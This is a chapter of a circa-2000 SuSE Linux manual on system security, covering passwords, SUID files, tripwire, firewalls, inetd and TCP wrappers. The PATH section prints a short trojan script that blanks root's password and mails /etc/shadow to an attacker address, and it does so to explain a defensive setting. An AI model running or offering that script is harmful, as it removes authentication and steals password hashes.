home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2000 May
/
Chip_2000-05_cd2.bin
/
docu
/
ascii
/
suselxen
/
slxen-18.txt
< prev
next >
Wrap
Text File
|
2000-03-11
|
43KB
|
764 lines
Part VII
Security and Getting Started
411
Chapter 18
Security is a Matter of Trust
18.1 Basics
Attacks and intruders from the Internet can no longer be ignored. Every day
one hears of some new danger to your PC at home or the entire company
network, be it from attacks from the Internet, or from viruses. But in reality
it is actually quite simple to take effective precautions against such threats.
Before we go into describing individual protection measures, it needs to be
clarified what is actually meant by the word "security", and protection against
"what". The following 6 points will quickly make it clear that the security of
a computer is a very sensible aim.
1. Protection of your resources
2. Access to information
3. Data availability
4. Data integrity
5. Confidentiality of sensitive information
6. Privacy
A complete security solution is necessary in order to prevent someone from
taking advantage of these issues. You must not only protect your computer
from outside attacks, but also against data loss from equipment failure, such
as a hard drive crash or faulty backup tapes.
Backing up on a truly regular basis is vital. In addition, the integrity of
these backups should be checked from time to time, to make sure they are
reliable.
Your computer is at risk in the following ways:
users connected directly to the corresponding computers present the largest
of all possible risks. These are not always intentional, but specific attacks
through staff, of course, cannot be ruled out.
communication links via both local and worldwide networks can be
scanned using sniffers and other hacker tools. Open communication
links make your computer vulnerable to a break in-even from another
part of the world.
direct access to your computer. It can be stolen, sabotaged or damaged by
someone untrustworthy.
413
18. Security is a Matter of Trust
natural disasters computers are very prone to natural catastrophes.
hardware and software, can be faulty, through design or concrete defects,
thus not only threatening data, but also compromising security, and
possibly making the service completely unusable (see also Section 91
page 418).
loss of storage media. Floppy disks, streamer tapes and hard drives can be
damaged, lost or stolen.
electromagnetic radiation is emitted by your computer, monitor and even
network cables. Sophisticated surveillance equipment can use this to
monitor activity on your computer. This radiation is also carried through
conduits and power cables, and, contrary to popular opinion, LCD moni-
tors also give off radiation.
We want to concentrate here on the first two points, because a well-thought
out use of SuSE Linux can, to a large extent, remove potential dangers. The
other points are probably of less interest to a private user of SuSE Linux, but
if a company network is being set up, those involved need to take these points
into consideration.
In Section 18.1.1 and Section 18.1.2 page 417 we first point out the different
types of attacks which exist. Later, in Section 18.2 page 418, we describe the
relevant security tools in detail. Finally, at the end of the chapter, we outline
some important general guidelines.
18.1.1 Local Security
He who sits in a glass house . . . If you want to secure your data, you should
begin with your personal computer. Even if your computer is not connected
or only connected via dialup to the Internet, you should take certain security
precautions. To have your hard drive erased accidentally by a party guest, can
be a pain. Even more so if it contains the only copy of your dissertation.
Passwords
As Linux is a multiuser operating system, it offers not only a means for
administering users but also a complete authentication mechanism. Although
it may not seem necessary at first, be sure to enter a password for every user on
your computer.1 This provides positive protection for your computer against
intruders. You should take special care to give the user `root' a good
password, because getting hold of the `root' password is one of the main
targets for crackers.
However, as long as others have physical access to your computer, the best
password in the world is of no use. Any person who can boot your computer
can attack it using a boot disk. For this reason, you should disable the floppy
as a boot device in your BIOS setup.
For this to be of any use, you will need to set a password for the BIOS. Do
not forget this password! Without it, you will not be able to access your
own BIOS ¡ unless the BIOS is reset by means of a jumper setting
1 Many references discuss this. In Section 18.4 page 426, we give you some practical advice.
414
18.1. Basics
If you use LILO (see Section 26 page 113) you should set the option
restricted together with a password (e. g. password=secure password)
in /etc/lilo.conf. Otherwise it is possible for anyone sitting directly at
the computer to compromise the system's security. Obviously the password
must be chosen carefully, and /etc/lilo.conf should only have read
permissions for `root'.
The package john in series sec (Security-related Software) contains a pro-
gram which tries to "guess" passwords. A good system administrator can use
this to automatically root out weak passwords, and then request users to only
use safe passwords.
Permissions
All users should work in a reduced permissions environment in order to be
sure they do not harm your system, whether deliberately or not. Furthermore,
you should avoid, as far as possible, working as user `root'. And you
should be the only person who knows the `root' password.
Buffer Overruns
Forcing buffer overruns is one of the most popular methods crackers use to
get `root' permissions on a computer. Also known as "stack smashing
vulnerabilities", these exploits overwrite static entries in a program's user
stack (e. g., while entering text) with a value that launches a command, such
as invoking a shell. This is possible in programs which have static array
dimensions and which don't check for buffer overrun.
The only vulnerable programs are those with the SUID bit set. These are
programs that are executed using the UID of the owner instead of the user.
Normally programs such as passwd use SUID because they perform tasks
not allowed to a normal user. For this reason, we have taken steps to minimize
the number of SUID programs in SuSE Linux as well as introducing further
measures to protect these programs from attack. You should also mointor the
relevant media and, when such loopholes are announced, you should obtain
the available updates and patches as soon as possible.
Another form of attack on privileged programs and running services are so-
called "link attacks". Through programs working carelessly in public direc-
tories, it can be possible to divert data to totally different files, thus compro-
mising the security of the system, or even bringing it down.
In order to reduce the number of SUID and SGID files in the system, in
SuSE Linux, you can, with YaST, in System Administration and
Security Settings change the settings to secure or paranoid in
the selection window file permissions changed to:. The permis-
sions set by these can be seen in the files /etc/permissions.secure
and /etc/permissions.paranoid. Before you use paranoid, how-
ever, you should ensure that the functionality of the system is not too re-
stricted for your own requirements. Because of its complexity and its huge
amount of code, the X Window System (XFree86) has, on a number of oc-
casions, attracted adverse attention. This problem has now been diffused in
SuSE Linux because the server and libraries are no longer set with SUID
415
18. Security is a Matter of Trust
`root'. Under certain conditions, however, there can be a number of draw-
backs in the client-server communication. It is possible, for example, to in-
tercept keyboard input, or to read window contents. By observing rule 3 and
using Xauthority (command xauth), as well as avoiding xhost +, a high
level of security can be achieved.
Where possible, to start remote X-programs, package ssh in series n (Net-
work) should be used. If you plan to use ssh commercially, please look at the
licenses in /usr/doc/packages/ssh/COPYING. ssh is available for
almost any platform. However, this so-called X11 forwarding also contains
its own concealed risks, so you should consider not using it al all.
For reasons of performance alone, the X Window System should never be
installed on critical servers (i.e. file servers, ftp servers, routers, etc.
.
Viruses and Trojan Horses
Until relatively recently, various types of viruses did their mischievous deeds,
and not just on home computers, because copying and transporting software
by floppy disks represented the ideal feeding ground for such programs. For-
tunately, only two viruses for Linux have been discovered until now. Because
software for Linux is hardly ever passed on in binary form, and since SuSE
Linux itself can be considered virus free, there is no threat from viruses, pro-
viding you abide by rule 1, on page 426.
It is a different matter, however, for the still increasingly seen macro viruses,
often sent by electronic mail (embedded in word processing documents).
Since there is no Linux version of Microsoft Office, these can do no dam-
age to SuSE Linux itself. The fact that SuSE Linux is increasingly used on
mail servers as a "Mail Transfer Agent", offers an ideal opportunity to scan
incoming and outgoing mails automatically for embedded viruses.
"Trojan horses" are completely different from viruses. These are programs
which claim to do one thing, but do some evil deed as well. For example, a
shell login Trojan horse might collect user names and passwords in a file, and
send this information on as e-mail. This may sound quite harmless, but it's
no joke if credit card numbers or the PIN of a bank account is involved.
The chances of loading a Trojan horse from the Internet or receiving one by
e-mail are pretty slim. It is, however, standard practice to leave behind some
Trojans on an already compromised system, in order to be able to access that
machine at any time. The existence of these can therefore be seen as a sure
sign of a compromised machine.
While there is no definitive protection against viruses and Trojan horses, you
can greatly reduce the likelihood of such attacks by installing a good virus
scanner, and copying both floppy disks and programs with great care. In
addition, please see Section 18.4 page 426. The use of programs such as
tripwire, package tripwire, series sec (Security relevant software), see
Section 92 page 419 is useful in identifying these.
416
18.1. Basics
18.1.2 Network Security
Most computers these days no longer exist on their own ("standalone"). As
Linux offers all the necessary capabilities, most Linux computers are on a
LAN and may just as easily be connected to the Internet via a modem. Linux
computers are also frequently used as gateways for complex subnets. These
factors provide many avenues of attack from the network.
You may avoid most of these attacks by setting up a firewall. The ports in
use will still be vulnerable, but they may be protected, using the appropriate
tools.
The potential for being attacked during the 30 minutes each day you read your
e-mail while connected to the Internet via dialup modem may be neglected.
Systems which use leased lines, however, should be protected. Below, we
describe the most important forms of attack.
Man in the Middle
"Man in the middle" attacks refer to a network that is routed via one or
more hosts. The intruder takes control of one of the routers, and can sniff
IP packets, redirect and replace them. As routers currently do not require
authentication, it is quite easy to do this. This will change when the new IPv6
protocol standard comes into force.
The only protection against this kind of attack is a good set of cryptographic
tools. These attacks occur mainly while accessing WWW sites or while
exchanging mail. You should never use commands such as telnet and
rsh, as they send an un-encrypted password over the network. This allows
devious hackers to read them! Switch to ssh to avoid this. E-mail can be
encoded, using pgp. Even HTTP pages can be encoded, using the SSL2
protocol. This protocol is used with package apache in series n (Network).
The quality of the encryption is only as good as the secure transmission of the
key. So you should take special care when doing this!
Buffer Overflows, Part 2
After so-called "sniffing", the passive reading of data (such as login and pass-
word), buffer overflows are the most frequent kind of security compromise
from the outside. The rule here is: every service accessible externally (e. g.
mail, webserver, POP3, etc.) represents a potential security problem. all
services which are absolutely essential and cannot be switched off, should,
wherever possible, only be accessible by certain systems, via a firewall con-
figuration of the Linux kernel (by means of ipchains). If this is not pos-
sible you should try and replace the service with an especially secure version
(e. g. package postfix instead of package sendmail). In addition to this,
experts can run every service in its own chroot environment.
2 SSL stands for Secure Socket Layer
417
18. Security is a Matter of Trust
Denial of Service
Denial of service attacks attempt to overload a network service. Under cer-
tain conditions, not only the specific service attacked but the computer under
attack as well, may no longer be reached. After the attack, the network pack-
age which initiated it will often have been moved somewhere else. Denial
of service is often used together with IP spoofing (see below) to conceal the
source of the attack. Tracing the attacker is almost impossible. You need an
effective means of protection.
When denial of service attacks are discovered, a patch protecting against it
will usually be available for download over the Internet within hours. SuSE
Linux has been patched to protect against every denial of service attack
known, up to the time of pressing the CD. The administrator must remain
informed at all times about both attacks and available patches.
IP spoofing
IP spoofing makes use of a security hole in the TCP/IP protocol-it doesn't
check the return address. Thus, this address may be changed to cover the
cracker's origin of attack.
It is important to configure your router to require an external network con-
nection. Only packets containing an external address should be routed to the
internal network, and packets with an internal address, to the external net-
work. It should be the responsibility of each ISP to configure their routers
properly so that invalid packets will not be routed.
18.2 Tools
Let's take a look at the tools available for maintaining your system and check-
ing for potential weak points. We would like to remind you at this point that
the potential threat to a computer varies in each individual case. In a network
protected by a firewall, it is clear that less protection and monitoring measures
are needed than in an unprotected network.
18.2.1 Local Tools
Two great advantages of Linux over other operating systems are it's stability
and the fact that it is a multiuser system. However, the latter entails risks
which should not be underestimated. In addition to the known permissions,
there are certain parameters which can be exploited by the advanced user.
Specifically, we mean the SUID bit. A program with this set automatically
has the permissions of the user to whom it belongs. If the said program
belongs to the superuser, and is started by any user, then it has the rights
of the superuser on the running system. This might sound dangerous but
this is normally not the case. In fact there are several programs that rely on
this capability. The command ping, for example, needs to be executed as
superuser. This would mean that only user `root' would be allowed to
execute this program. To avoid this, the SUID bit is set.
newbie@earth:/home/newbie > ls -l /bin/ping
418
18.2. Tools
-rwsr-xr-x 1 root root 13216 Mar 17 16:36 /bin/ping
If you would like to know the programs that have the SUID bit set and belong
to user `root', enter the following command:
newbie@earth:/home/newbie > find / -uid 0 -perm +4000
This is one way of detecting "suspicious" programs. YaST enables you to set
`Permissions will be set to:' (in `System administra-
tion' and `Security settings') secure. The files which are af-
fected by this can be seen in /etc/permissions.secure.
No one has the time to monitor his computer all the time. Fortunately there
are tools to help you perform this tedious task. One of these tools deserves
special mention, recommended as it is by CERT.3 This is the tripwire package
in package tripwire, series n (Network).
Tripwire
Tripwire is easy to understand. It checks the system and saves the states and
necessary information in a database. You can specify the files which are to be
checked in a configuration file.
Tripwire doesn't check for infected files or system errors. It assumes that it
is installed on a clean system. This is why it should be installed directly after
the system has been set up and before it is connected to the network. You
create the database as follows:
root@earth:root > /var/adm/tripwire/bin/tripwire -init
The paths to the database and configuration files, as they have been compiled
into package tripwire on SuSE Linux are shown in Table 18.1.
/var/adm/tripwire Database and configuration file
Table 18.1: Tripwire
The paths are chosen such that only the superuser (`root') may change
to the Tripwire home directory. Ideally the database should be on a read-
only filesystem (e. g., a write protected floppy disk), otherwise a successful
attacker could cover his tracks by manipulating the database. An example
configuration file for Tripwire may be found in /usr/doc/packages/
tripwire/tw.conf.example.linux. Help on the syntax of Tripwire
may be found in the corresponding manpage tw.config. You may apply
different checksum methods to different files and directories. After you have
3 CERT = Computer Emergency Response Team; see http://www.cert.dfn.de/
dfncert/info.html.
419
18. Security is a Matter of Trust
set up your configuration file, you may run tripwire regularly, for example, as
a cron job.
SuSE Security Tools
SuSE Linux now has four specially developed security programs to help you
make your system more secure, and help you in controlling this:
The package firewall, series sec (Security-related Software) contains the
script/usr/sbin/SuSEfirewall, which reads out the configuration file
/etc/rc.firewall and then generates restrictive filter lists by means of
the program ipchains. More information can be found in Section 18.2.2 on
the facing page, Network Tools.
The package secchk, series sec (Security-related Software) contains a
number of small scripts which make special safety checks on the system on a
daily, weekly and monthly basis (such as the consistency of the password file,
user files, breaking passwords, modules which are running), and if changes
have been made, the administrator is informed.
The package hardsuse, series sec (Security-related Software) contains
the perl script /usr/sbin/harden suse, which was developed to provide system
administrators with a simple-to-use program to increase security. When it
is started, nine yes/no questions are asked (for example, should all services
should be de-activated user security increased, or SUID and SGID files mini-
mized?), and according to the answers given, the system is then re-configured.
You can find a log file with the changes in /etc/harden_suse.log, and
backup copies of the modified files are also created. If the system subse-
quently does not perform as expected, the changes can be undone, using the
script /etc/security/undo harden suse.pl.
The package scslog, series sec (Security related software) contains a ker-
nel module which, when it has been loaded, (you can automate this by adding
it to the startup files, for example) will protocol all incoming and outgoing
network connections.
The package secumod, series sec (Security related software) contains a
further module which prevents, or makes it difficult, for attacks to be made on
your system. Up until now, this includes protection from symlink, hard link
and pipe attacks, processes can, if desired, be stopped from being "strace"
d, and more besides. Because this package is still very new and was not
completely documented at the time of the handbook going to press, we would
like to ask you to have a look at the documentation of the package.
Further tools are already being prepared.
Surfing the Log Files
The log files are a very important resource for gathering information about
your system. These are files where programs leave a record of their work.
At least one of them, /var/log/messages, should be checked regularly.
Most of the logs in SuSE Linux are configured to write to this file.
Normally you don't have the time to browse this huge file. Luckily there are
tools which make it easier to read these log files. One of these is the program
420
18.2. Tools
logsurfer, which continually checks log files according to directions in a con-
figuration file. You may attach commands to certain occurrences in the log
files. For example, if the word "fail" occurs, you may want to be informed via
e-mail. logsurfer is a way to do this. logsurfer comes with an excellent man-
page, see manpage for logsurfer.conf (man 4 logsurfer.conf).
The PATH Variable and User `Root'...
You may have noticed while working with SuSE Linux that the current direc-
tory is excluded from the search path of `root'. This is why when you are
`root', you have to add the prefix ./ to launch commands from the current
directory. The reason that SuSE Linux is configured this way is illustrated in
the example below:
* Suppose there is a user working on your system who creates the script in
File contents 18.2.1.
#!/bin/sh
cat /etc/shadow | \
sed 's;\( root:\)[ :]*\(:.*\);\1\2;' > /etc/shadow
mailx hacker@@hackit.org -s "Root Account hacked" < /etc/shadow
ls $*
File contents 18.2.1: Shell script to hack root account
* This script is then moved to /tmp/ls.
* Now, if `root' changes to /tmp, even though he has the actual path in
his PATH environment variable, `root' will not launch /bin/ls, but
our little script in /tmp/ls instead. The result of executing this script is
that the `root' password is removed. Even worse, the script also sends
the user who wrote it an e-mail, informing him that the password has been
removed. Now, he may freely log in as user `root'. The consequences
may be very unpleasant ;-) .
If this current directory was not in the search path, this could only have
happened if you had explicitly typed ./ls. This, by the way, is an example
of a Trojan horse, as described above (see Section 90 page 416).
18.2.2 Networking Tools
It is instructive to observe a host that is connected to a network. Below, we
want to point out how you can protect your Linux computer from attacks
through the network.
inetd
An elementary approach to this is a carefully thought out switching of the
ports which inetd (Internet "Super Server" ) makes available. In SuSE Linux,
421
18. Security is a Matter of Trust
some of the "vulnerable" services are normally disabled by default. These
include the so-called "internal services" of inetd. The configuration file is
/etc/inetd.conf. But other services as well should be enabled or dis-
abled with care ¡ according to requirements. We recommend that you take a
look at the configuration files, since, for example, POP3 and other services
are enabled by default! A list of services that are completely sufficient for
nearly all cases is shown in File contents 18.2.2.
ftp stream tcp nowait root /usr/sbin/tcpd wu.ftpd -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
shell stream tcp nowait root /usr/sbin/tcpd in.rshd -L
login stream tcp nowait root /usr/sbin/tcpd in.rlogind
finger stream tcp nowait nobody /usr/sbin/tcpd in.fingerd -w
ident stream tcp wait nobody /usr/sbin/in.identd in.identd \
-w -e -t120
File contents 18.2.2: Example configuration for inetd
Think hard about whether you really need services such as telnet, shell and
login. The disadvantage of each of these services is that passwords are tran-
mitted without encryption. Reading these passwords is not difficult. There
are tools which make this kind of attack trivially easy.
Never, under any circumstances, allow remote `root' access! Once again,
we direct your attention to the "Secure Shell" (package ssh). It encrypts
everything, even the password. ( Encryption).
Questions on the SuSE Packet Filter Firewall cannot be answered by in-
stallation support.
The SuSE Packet Filter Firewall (package firewall, series sec (Security-
related Software)) is activated and configured by the file /etc/rc.
firewall. Individual entries are documented and commented in the file
itself. In order to help first-time users as well into the intricacies of firewalls,
here are some basic explanations and hints on using the SuSE Packet Filter
Firewall.
The family of protocols used for communication via the Internet is the In-
ternet protocol known as "TCP/IP". TCP/IP stands for Transmission Control
Protocol and Internet Protocol. TCP/IP is nowadays available on almost all
hardware, operating systems and network platforms. It was developed by the
United States Department of Defence (DoD) and presented to the public for
the first time in 1978.
A TCP/IP network transforms data between computer systems by turning
the data into packets, and sending these packets. Each packet begins with
a header containing various control information, such as the address of the
target computer. This header is then followed by the data to be transmitted.
If, for example, a file is to be transported to another computer via the network,
the contents of this file are transformed into a series of packets. These packets
are then sent to the target computer.
422
18.2. Tools
The error-free transmission of the packets is guaranteed by the Transmission
Control Protocol (TCP). It ensures that the packets arrive in the right order.
TCP provides the transport layer and announces errors which cannot be cor-
rected to the next-higher IP layer. A further transport protocol of the family
is UDP. With UDP, there is no guarantee of error-free transmission, making
transmission faster than with TCP. This means, however, that when using
UDP you must check in other ways (through the application) that transmis-
sion errors are detected and corrected.
An IP address (IP version 4) is a 32-bit value. To make IP addresses more
readable they are written in 8-bit portions, separated by dots (e. g.192.168.0.20).
In order for a computer to maintain a number of connections simultaneously,
and for it to be able to keep these connections separate from each other,
the communication takes place via so-called ports (0 to 65535). Different
connections are assigned to these ports, that is, in the header of a TCP or
UDP packet the source and target ports of the sending computer (source
address) and the receiving computer (target address) are entered, together
with the addresses of the computers themselves. A number of the ports from
0 to 65535 are reserved for specific services (see also /etc/services).
The TCP port 23 is, for instance, the port for telnet connections. A further
specification concerns ports 0 to 1023 (TCP and UDP). They are the so-called
privileged ports. Only trustworthy programs, which sometimes need to be
carried out with system administrator privileges, can offer their services on
these ports (see /etc/services).
the ports 1024 to 65535 are referred to as non-privileged ports. The diference
can be illustrated with the somewhat simplified example of a file transfer with
ftp. An FTP server provides its services on TCP port 21. If an FTP client
on the computer is started with the IP address 192.168.3.5 (client) with
the command
newbie@earth:/home/newbie > ftp 192.168.3.16
then the client creates a TCP connection to port 21 of the computer with the
IP address 192.168.3.16 (Server). On port 21 the FTP server answers
and processes the user identification (login name and password query). The
FTP commands which the user enters after logging in are also transmitted
via this connection. If data is to be transferred from the server to the client,
(after entering the command ls or get) the server independently creates
a connection to a non-privileged port of the client. The actual data is then
transmitted via this connection.
TCP/IP was designed for very large networks, and for this reason contains
mechanisms for structuring a network. The entire 32-bit wide address space
can be divided into "subnets". A subnet is formed by a number of bits being
defined (beginning from the left) as the net address of a subnet. For the subnet
with the address 192.168.3.0, the first 24-bits of the address form the
network address. Through the "subnetmask" (network mask) it is defined
how many bits of an address form the network address. The subnetmask
255.255.255.0 for example, specifies that the computer with the address
192.168.3.5 can be found in the subnet with the address 192.168.3.0.
Subnets within a large network are usually connected by routers. Routers
are either specialised machines or computers which are sufficiently well
423
18. Security is a Matter of Trust
equipped, and which ensure that packets find the correct path to their destina-
tion. The counteracting role to the subnet mask is performed by the so-called
broadcast address. Via the broadcast address, all computers of a subnet are
reachable. Example: all computers in the network 192.168.3.0 can be
reached via the broadcast address 192.168.3.255. If a connection to the
Internet has been made then the computer is part of the worldwide Internet.
Each time a connection to the provider is activated, that computer is reachable
from the Internet. Now you need to take steps to prevent unauthorized access
from the Internet. This task is taken on by the SuSE Packet Filter Firewall.
Packet filters are network level firewalls. They make fundamental deci-
sions on the basis of source addresses, target addresses and ports in spe-
cific IP packets. A simple router or the SuSE Packet Filter Firewall are
traditional network level firewalls. Since they are not intelligent enough to
determine what significance the contents of an IP packet have and where
it really originates from, they do not offer sufficient protection against
attacks. Modern network level firewalls (for example, SINUS Firewall
I for Linux, http://www.sinus-firewall.org) are more highly
developed, and gather internal information on the status of connections
which run via them, the contents of data streams, etc. Application level
firewalls (e. g.TIS Firewall Toolkit) on the other hand, are usually comput-
ers on which proxy servers run and which carefully protocol and examine
the data traffic running over them. Since the proxy servers are programs
which run on the firewall, they are ideally suited for protocol and access
protection mechanisms.
Where should the SuSE Packet Filter Firewall be used? For networks
with an increased need for protection (strictly speaking, anywhere where
personal information is stored), application level firewalls are still the first
port of call, due to the way they function. For such networks the SuSE Packet
Filter Firewall does not provide sufficient protection.
The SuSE Packet Filter Firewall is intended for protecting a private PC, a
mini-network at home or a workstation within a trusted network.
You should only use the SuSE Packet Filter Firewall to protect company
networks if you know exactly what you are doing (see bibliography).
To set up and maintain firewalls, an in-depth knowledge of networks and
the protocols used in them is essential. This knowledge ultimately cannot
be replaced by a graphical interface or a pre-configured setup, such as that
provided by the SuSE Packet Filter Firewall.
Documentation on the SuSE Packet Filter Firewall can be found in /usr/
doc/packages/firewall and /etc/rc.firewall.
If you want to tackle the subject of firewalls in more depth, we recommend
you experimenting and studying the following sources:
The Firewall handbook for Linux 2.0 and 2.2 by Guido Stepken provides
almost everything you need to know in order to construct a secure firewall
with Linux, from detailed technical information to the description of typical
424
18.3. Security in SuSE Linux
weak points and errors. The firewall handbook is required reading, and is only
available online (http://www.little-idiot.de/firewall/).
The Freefire project is a good starting point for all those who are interested
in firewalls on a free software basis (http://sites.inka.de/sites/
lina/freefire-l/).
TCP Wrappers
TCP wrappers (tcpd) enable you to securely use certain services for networks
or IP addresses. tcpd is activated in SuSE Linux by default. You may see this
in column six of File contents 18.2.2 page 422 and /etc/inetd.conf.
The concept is quite simple: tcpd launches the services that you actually
need, first checking to see if the client is authorized to access them.
This access control takes place via the two files /etc/hosts.allow and
/etc/hosts.deny.
* Access is granted if a combination of client and service is found in the file
/etc/hosts.allow.
* Similarly, access is denied if such a combination is found in the file
/etc/hosts.deny.
* If there is no rule in one of the above files, access is allowed.
The first rule to be found is used. If access to, for example, the telnet port
in /etc/hosts.allow is allowed, it will be allowed even if it is denied
in /etc/hosts.deny.
The syntax for making entries to these files is described in the manpage for
hosts access (man 5 hosts access).
There is an alternative to TCP wrappers called xinetd, which combines the
features of inetd and tcpd. One disadvantage of xinetd is that the configura-
tion files of inetd and xinetd are incompatible.
Only one Internet "Super Server" (inetd or xinetd) may be started. You
have to decide which one to use.
In the series sec (Security-related Software) further programs can be found
which can be of help in building a secure system. Just browse through the
packages there.
18.3 Security in SuSE Linux
SuSE offers the following services to accomplish the highest possible
security-oriented distribution:
Two Mailing Lists are Available for Everyone:
* suse-security-announce ¡ contains SuSE notifications of secu-
rity problems.
* suse-security ¡ contains notifications and is open to public discus-
sion.
425
18. Security is a Matter of Trust
To subscribe to either of the mailing lists, just send an electronic mail to
majordomo@suse.com, with the contents:
subscribe suse-security or
subscribe suse-security-announce
Central Notification of New Security Problems:
If you find a new security problem (be sure to check the updates available
beforehand), please send an electronic mail to: security@suse.de, with
a description of the problem. We will attend to it immediately. You can
encrypt the files with the package pgp. Our public pgp key4 can be
downloaded from: http://www.suse.de/security ( encryption).
18.4 General Rules
1. Only use `root' for administrative purposes. You should create a user
for your daily work.
2. Try to avoid the commands telnet, rlogin and rsh.
3. Use ssh instead, if you want to work remotely.
4. Deactivate all network services that are not needed.
5. Make sure you have up-to-date versions of relevant packages such as
bind, sendmail and ssh.
6. Remove SUID and SGID bits from all files in the system that are not
essential for normal users to work with.
7. Check your log files regularly.
4 PGP Key fingerprint = 73 5F 2E 99 DF DB 94 C4 8F 5A A3 AE AF 22 F2 D5
426
